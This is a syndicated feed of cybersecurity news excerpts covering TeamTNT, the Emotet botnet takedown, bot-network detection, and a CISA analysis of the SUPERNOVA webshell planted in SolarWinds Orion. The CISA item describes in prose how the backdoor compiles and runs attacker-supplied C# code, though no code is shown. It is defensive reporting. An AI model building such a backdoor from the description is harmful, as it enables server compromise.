The detection-evasion tool, libprocesshider, hides TeamTNT’s malware from process-information programs.
Read More
The post TeamTNT Cloaks Malware With Open-Source Tool appeared first on Malware Devil.
2020 was certainly an eventful year in the land of cybersecurity. There was no shortage of ransomware attacks and data breaches, and my personal prediction is that 2021 will be no different Large organizations are increasingly making significant investments in…
The post What are Windows Process Creation Events and Why You Should Enable Them appeared first on LogRhythm.
The post What are Windows Process Creation Events and Why You Should Enable Them appeared first on Security Boulevard.
The post What are Windows Process Creation Events and Why You Should Enable Them appeared first on Malware Devil.
The suspect allegedly has extorted $27.6 million from ransomware victims, mostly in the healthcare sector.
Read More
The post NetWalker Ransomware Suspect Charged: Tor Site Seized appeared first on Malware Devil.
Hey there, and happy New Year. I wanted to take a moment and write about what I think the coming year is going to look like for information security professionals. This is going to be an introductory post to a multi-part series of blogs so I can talk about different topics a bit more […]
The post The New Year in Cybersecurity: Supply Chain Attacks, Part 1 appeared first on Hurricane Labs.
The post The New Year in Cybersecurity: Supply Chain Attacks, Part 1 appeared first on Security Boulevard.
The post The New Year in Cybersecurity: Supply Chain Attacks, Part 1 appeared first on Malware Devil.
A new version of NAT slipstreaming allows cybercriminals an easy path to devices that aren’t connected to the internet.
Read More
The post Remote Attackers Can Now Reach Protected Network Devices via NAT Slipstreaming appeared first on Malware Devil.
This week, in the Enterprise Security News, Platform9 unburdens users from the complexities of Kubernetes, Swimlane Raises $40 Million, SonicWall hacked by zero-days in its own products, Deloitte Buys Root9B, Cygilant and SentinelOne Partnership, Fortinet announces AI-powered XDR, AlgoSec Announced updates to A32, ESET Launches Enhanced Cloud-based Endpoint Security Management, Entrust acquires HyTrust, LogRhythm acquires MistNet, Huntress Acquires EDR Technology From Level Effect, & more!
Visit https://www.securityweekly.com/esw for all the latest episodes!
Show Notes: https://securityweekly.com/esw214
The post Platform9, Swimlane, SonicWall 0-Days, & Fortinet – ESW #214 appeared first on Malware Devil.
Fredrik Nordberg Almroth, Security Researcher at Detectify, tells the story of how he managed to claim the top-level domain of an entire country – the Congo (DRC), .cd – before any bad actors could snatch it up. He will also discuss domain takeovers (TLD as well as subdomains) and how they can be prevented. Key to this is to keep track of your assets and monitor them for vulns.
Visit https://www.securityweekly.com/esw for all the latest episodes!
Show Notes: https://securityweekly.com/esw214
The post DNS Hijacking – Fredrik Nordberg Almroth – ESW #214 appeared first on Malware Devil.
Digital Defense, Inc. announced the integration of its Frontline Vulnerability Manager
(Frontline VM) proprietary scanning technology, part of its Frontline.Cloud cloud-native software as a service (SaaS) platform, with the LogRhythm NextGen SIEM Platform.
The post Digital Defense, Inc. Technology Integration with LogRhythm Improves Threat Detection and Response Through Risk-Based Prioritization appeared first on LogRhythm.
The post Digital Defense, Inc. Technology Integration with LogRhythm Improves Threat Detection and Response Through Risk-Based Prioritization appeared first on Security Boulevard.
The post Digital Defense, Inc. Technology Integration with LogRhythm Improves Threat Detection and Response Through Risk-Based Prioritization appeared first on Malware Devil.
Tomorrow, January 28, is Data Privacy Day! Data protection is a large part of our work at Hyperproof, …
The post Celebrate Data Privacy Day with Advice from Top Data Privacy Experts appeared first on Hyperproof.
The post Celebrate Data Privacy Day with Advice from Top Data Privacy Experts appeared first on Security Boulevard.
The post Celebrate Data Privacy Day with Advice from Top Data Privacy Experts appeared first on Malware Devil.
This week, in the Enterprise Security News, Platform9 unburdens users from the complexities of Kubernetes, Swimlane Raises $40 Million, SonicWall hacked by zero-days in its own products, Deloitte Buys Root9B, Cygilant and SentinelOne Partnership, Fortinet announces AI-powered XDR, AlgoSec Announced updates to A32, ESET Launches Enhanced Cloud-based Endpoint Security Management, Entrust acquires HyTrust, LogRhythm acquires MistNet, Huntress Acquires EDR Technology From Level Effect, & more!
Visit https://www.securityweekly.com/esw for all the latest episodes!
Show Notes: https://securityweekly.com/esw214
The post Platform9, Swimlane, SonicWall 0-Days, & Fortinet – ESW #214 appeared first on Malware Devil.
This week, in the Enterprise Security News, Platform9 unburdens users from the complexities of Kubernetes, Swimlane Raises $40 Million, SonicWall hacked by zero-days in its own products, Deloitte Buys Root9B, Cygilant and SentinelOne Partnership, Fortinet announces AI-powered XDR, AlgoSec Announced updates to A32, ESET Launches Enhanced Cloud-based Endpoint Security Management, Entrust acquires HyTrust, LogRhythm acquires MistNet, Huntress Acquires EDR Technology From Level Effect, & more!
Visit https://www.securityweekly.com/esw for all the latest episodes!
Show Notes: https://securityweekly.com/esw214
The post Platform9, Swimlane, SonicWall 0-Days, & Fortinet – ESW #214 appeared first on Malware Devil.
This week, in the Enterprise Security News, Platform9 unburdens users from the complexities of Kubernetes, Swimlane Raises $40 Million, SonicWall hacked by zero-days in its own products, Deloitte Buys Root9B, Cygilant and SentinelOne Partnership, Fortinet announces AI-powered XDR, AlgoSec Announced updates to A32, ESET Launches Enhanced Cloud-based Endpoint Security Management, Entrust acquires HyTrust, LogRhythm acquires MistNet, Huntress Acquires EDR Technology From Level Effect, & more!
Visit https://www.securityweekly.com/esw for all the latest episodes!
Show Notes: https://securityweekly.com/esw214
The post Platform9, Swimlane, SonicWall 0-Days, & Fortinet – ESW #214 appeared first on Malware Devil.
OT Cybersecurity teams have been working within the Purdue Enterprise Reference Architecture since it was created in the mid-1990s. Although not developed as a security model, by mapping the interconnections and interdependencies of the high-level components of typical industrial control systems (ICS), the Purdue reference architecture has provided important guidance for how to defend OT systems. The adoption of numerous IT systems into OT environments, however, has raised questions about the continued relevance of the ICS Purdue model.
The post ICS Purdue Model in Industrial Internet of Things (IIoT) & Cloud appeared first on Security Boulevard.
The post ICS Purdue Model in Industrial Internet of Things (IIoT) & Cloud appeared first on Malware Devil.
In a coordinated action, multiple law enforcement agencies have seized control of the Emotet botnet. Agencies from eight countries worked together to deliver what they hope will be a decisive blow against one of the world’s most dangerous and sophisticated computer security threats.
In a statement announcing the action, Europol described Emotet as “one of the most significant botnets of the past decade” and the world’s “most dangerous” malware.
The malware has been a significant thorn in the side of victims, malware researchers and law enforcement since it first emerged in 2014. Originally designed as a banking Trojan, the software became notorious for its frequent shapeshifting and its ability to cause problems for people trying to detect it. This lead to it being used as a gateway for other kinds of malware. Emotet’s criminal operators succeeded in infiltrating millions of Windows machines, and then sold access to those machines to other malware operators.
Taking down Emotet’s infrastructure not only hobbles Emotet, it also disrupts an important pillar of the malware delivery ecosystem.
Successful botnets are typically highly distributed and very resilient to takedown attempts. Effective law enforcement cooperation is therefore vital, so that all parts of the system are tackled at the same time, ensuring the botnet can’t reemerge from any remnants that go untouched.
In this case, that meant tackling hundreds of servers simultaneously. Describing the level of cooperation required, Malwarebytes’ Director of Threat Intelligence, Jerome Segura said:
Going after any botnet is always a challenging task, but the stakes were even higher with Emotet. Law Enforcement agencies had to neutralize Emotet’s three different botnets and their respective controllers.
Although it gives few details, the Europol press release hints that a novel and sophisticated approach was used in the action, stating that the Emotet botnet was compromised “from the inside”. According to the agency, “This is a unique and new approach to effectively disrupt the activities of the facilitators of cybercrime.”
Segura added:
Unlike the recent and short-lived attempt to take down TrickBot, authorities have made actual arrests in Ukraine and have also identified several other individuals that were customers of the Emotet botnet. This is a very impactful action that likely will result in the prolonged success of this global takedown.
It remains to be seen if this is the final chapter of the Emotet story, but even if it is, we aren’t at the end of the story just yet.
This action removes the threat posed by Emotet, by preventing it from contacting the infrastructure it uses to update itself and deliver malware. However, the infections remain, albeit in an inert state. To complete the eradication of Emotet, those infections will need to be cleaned up too.
In a highly unusual step, it looks as if the clean up isn’t going to be left to chance. A few hours after the takedown was announced, ZDNet broke the news that law enforcement in the Netherlands are in the process of deploying an Emotet update that will remove any remaining infections on March 25th, 2021.
The post Pow! Emotet’s down. Is it out? appeared first on Malwarebytes Labs.
The post Pow! Emotet’s down. Is it out? appeared first on Malware Devil.
This also could be titled an intro to Silicon Valley ethics: 1617 rent-able carriages (shared ride) by order of monarch 1662 fixed routes for shared ride by order of monarch 1823 Stanislas Baudry’s Omnés Omnibus (for everyone) 1853 Impériale omnibus (upper deck cheaper) 2008 Google bus (no poor people allowed) 2017 Lyft shuttle (no poor … Continue reading Big Tech Insider’s Guide: Silicon Valley Bus History
The post Big Tech Insider’s Guide: Silicon Valley Bus History appeared first on Security Boulevard.
The post Big Tech Insider’s Guide: Silicon Valley Bus History appeared first on Malware Devil.
Many thanks to BSidesSF and Conference Speakers for publishing their outstanding presentations; of which, originally appeared at the organization’s BSidesSF 2020, and on the DEF CON YouTube channel. Additionally, the BSidesSF 2021 will take place on March 6 – 9, 2021 – with no cost to participate. Enjoy!
The post BSidesSF 2020 – Allan Friedman’s ‘How Software Transparency Can Help Save The World’ appeared first on Security Boulevard.
The post BSidesSF 2020 – Allan Friedman’s ‘How Software Transparency Can Help Save The World’ appeared first on Malware Devil.
via the comic delivery system monikered Randall Munroe resident at XKCD!
The post XKCD ‘Trash Compactor Party’ appeared first on Security Boulevard.
The post XKCD ‘Trash Compactor Party’ appeared first on Malware Devil.
Misinformation and disinformation have scaled in the Information Age. MIT researchers analyzed 126,000 stories between 2006 and 2016 and found that false stories spread six times faster than true stories on social networks. Whether falsehoods are deliberate (disinformation) or unintentional (misinformation), they impact every aspect of society, from politics to public health to commerce. But one thing falsehoods have in common is that they typically rely heavily on bot networks or automation for distribution. The following four social media behaviors are clues that you are dealing with a bot network versus a legitimate person or business.
1. Unnaturally Dense Relationship Networks
In order to appear important or authoritative, an account has to have a critical mass of followers or correspondence. Therefore, when a disingenuous actor is creating a network of bots, they cannot simply create an account and start reposting false information; instead, the account must be created with a network of “friends” to give it an air of authority. Since these are created accounts, they generally also create fake relationships. Bots are usually most connected to other bots. From a relationship-network perspective, a bot network exhibits unnaturally dense and interconnected organizations that have limited connectivity to real, verifiable accounts. Typically, bot networks exhibit the following traits:
Analyzing secondary and tertiary connections is key. Bot networks almost always sit on the periphery of the real conversation; a bot cluster is like a tumor hanging from the side of the true network. If you do an effective job of mapping the full network of relationships around a topic, then detecting these unusual, dense clusters on the periphery can be straightforward.
2. Reusing Post-Generating Algorithms
Typical human interactions involve a mix of original content, reposts from other authors, and engaging with or replying to conversation streams. In contrast, bots have little (if any) original content, repost almost exclusively, and have no engagement in actual conversations. The vast majority of bots are not sophisticated enough to effectively vary their reposted content, making it extremely easy to detect the specific sources of misinformation/disinformation they are designed to promote. Even more sophisticated bots that try to vary their content and sourcing still show high levels of automation. This is especially easy to detect when looking at the coordination across the entire bot network, as you can see how the connected network was designed to propagate a message.
3. Highly Uniform Posting Schedules
Humans post when the mood strikes, taking time out to eat, sleep, and live. Even though humans have patterns in behavior (e.g., always engaging online before work and before going to bed), they show daily variability and have regular times away (e.g., vacations). Less sophisticated bots follow strict posting schedules; for example, they often post on 24-hour cycles, leaving no time for sleep. Even the more sophisticated bots that employ randomization for posting content and have built-in downtime eventually exhibit patterns that can be identified. Analyzing the posting schedule reveals patterns that are inconsistent with human behavior.
4. Positioning to Influence Specific Audiences
The target of a bot network is typically identifiable because bot networks are tools designed for achieving specific information goals. Here are two examples.
A series of accounts generated more than 45,000 posts, averaging 18 posts per hour, 24 hours a day (with no time for sleep, etc.). Over 80% of the content overlapped between accounts. But the final piece of the puzzle came by looking at the external connections. In this case, the bot network was pushing content from aspiring authors, songwriters, and artists. You could see that these verifiable artists had likely purchased services designed to increase their social following that employ bot networks for increasing follower counts and sending a signal that an artist is an up-and-comer breaking onto the scene.
While investigating foreign influence regarding policy toward the Syrian Civil War, we discovered an account and subsequent network where every influential account voiced deep mistrust of the West and significant support for all Russian geopolitical positions. All of the accounts in this network reposted each other, creating a pro-Russian, anti-Western “echo chamber” that was designed to promote Russian policies throughout Europe and the West.
Look for Clues
Bot networks are common vectors for false information, but there are certain behaviors and traits to look for that can tip you off that these accounts aren’t backed by independent people or businesses. Put these clues to work the next time you’re confronted with questionable information to keep falsehoods from spreading.
Kevin Graham served as an active-duty US Marine Corps infantryman before continuing his service as a government civilian. His career as an intelligence professional has provided numerous deployments around the world, serving in a multitude of capacities while supporting … View Full Bio
Recommended Reading:
Comment |
Print |
More Insights
The post 4 Clues to Spot a Bot Network appeared first on Malware Devil.
Original release date: January 27, 2021
NotificationThis report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise. This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp. SummaryDescriptionThis report provides detailed analysis of several malicious artifacts, affecting the SolarWinds Orion product, which have been identified by the security company FireEye as SUPERNOVA. According to a SolarWinds advisory, SUPERNOVA is not embedded within the Orion platform as a supply chain attack; rather, it is placed by an attacker directly on a system that hosts SolarWinds Orion and is designed to appear as part of the SolarWinds product. CISA’s assessment is that SUPERNOVA is not part of the SolarWinds supply chain attack described in Alert AA20-352A. See the section in Microsoft’s blog titled “Additional malware discovered” for more information. This report describes the analysis of a PowerShell script that decodes and installs SUPERNOVA, a malicious webshell backdoor. SUPERNOVA is embedded in a trojanized version of the Solarwinds Orion Web Application module called “App_Web_logoimagehandler.ashx.b6031896.dll.” The SUPERNOVA malware allows a remote operator to dynamically inject C# source code into a web portal provided via the SolarWinds software suite. The injected code is compiled and directly executed in memory. For a downloadable copy of IOCs, see: MAR-10319053-1.v1.stix. Submitted Files (3)02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1 (AssemblyInfo__.ini) 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 (1.ps1) c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 (App_Web_logoimagehandler.ashx….) Findings290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515Tagstrojan Details
Antivirus
YARA RulesNo matches found. ssdeep MatchesNo matches found. Relationships
DescriptionThis file is an event log that details the execution of a PowerShell script designed to Base64 decode and install a 32-bit .NET dynamic-link library (DLL) into the following location: “C:inetpubSolarWindsbinApp_Web_logoimagehandler.ashx.b6031896.dll (c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71). The DLL is patched with the SUPERNOVA webshell and is a replacement for a legitimate SolarWinds DLL. Displayed below is a portion of the event log with the victim information redacted. It indicates the malicious PowerShell was executed by the legitimate SolarWinds application “E:Program Files (x86)SolarWindsOrionSolarWinds.BusinessLayerHost.exe.” –Begin event log– c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71Tagsbackdoortrojan Details
Antivirus
YARA RulesNo matches found. ssdeep Matches
PE Metadata
PE Sections
Packers/Compilers/Cryptors
Relationships
DescriptionThis file is a 32-bit .NET DLL that has been identified as a modified SolarWinds plug-in. The malware patched into this plug-in has been identified as SUPERNOVA. The modification includes the “DynamicRun” export function which is designed to accept and parse provided arguments. The arguments are expected to partially contain C# code, which the function will compile and execute directly in system memory. The purpose of this malware indicates the attacker has identified a vulnerability allowing the ability to dynamically provide a custom “HttpContext” data structure to the web application’s “ProcessRequest” function. The ProcessRequest function takes an HttpContext Data structure as an argument. It parses portions of the request substructure of the parent HttpContext data structure using the keys “codes”, “clazz”, “method”, and “args”. The parsed data is placed in the respective variables codes, clazz, method, and args. These four variables are then provided as arguments to the DynamicRun function described next. The “DynamicRun” function is designed to accept C# code and then dynamically compile and execute it. The “codes” variable provided to the function contains the actual C# code. The “clazz” variable provides the class name that is used when compiling the source code. The “method” variable will contain the function name that will be called for the newly compiled class. The “args” variable will contain the arguments provided to the executed malicious class. After parsing out and executing the provided code, the “ProcessRequest” function will continue on to call a function named “WebSettingsDAL.get_NewNOCSiteLogo.” Analysis indicates this is a valid SolarWinds function designed to render the product logo on a web application. –Begin ProcessRequest Function– –Begin DynamicRun Function– ScreenshotsFigure 1 – Screenshot of the modification. 02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1Details
AntivirusNo matches found. YARA RulesNo matches found. ssdeep MatchesNo matches found. DescriptionThis file contains the following text: –Begin text– Relationship Summary
RecommendationsCISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.
Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”. Contact Information
CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/ Document FAQWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis. What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis. Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk. Can I submit malware to CISA? Malware samples can be submitted via three methods:
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov. |
This product is provided subject to this Notification and this Privacy & Use policy.
The post AR21-027A: MAR-10319053-1.v1 – Supernova appeared first on Malware Devil.
It’s common knowledge that attackers often use email as a delivery mechanism for their malicious activity — which can range from enticing victims to click a phishing URL or download a malicious attachment.
To support these activities, attackers seek out tools that assist in the mass sending of malspam (malicious spam) emails from a compromised website. PHP scripts like Leaf PHPMailer are well suited for this task.
Hacktool Analysis: Leaf PHPMailer
Leaf PHPMailer is a PHP mailer hacktool that lets an attacker send out large amounts of malspam emails from a compromised website’s web server.
Continue reading Phishing & Malspam with Leaf PHPMailer at Sucuri Blog.
The post Phishing & Malspam with Leaf PHPMailer appeared first on Security Boulevard.
The post Phishing & Malspam with Leaf PHPMailer appeared first on Malware Devil.
In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...
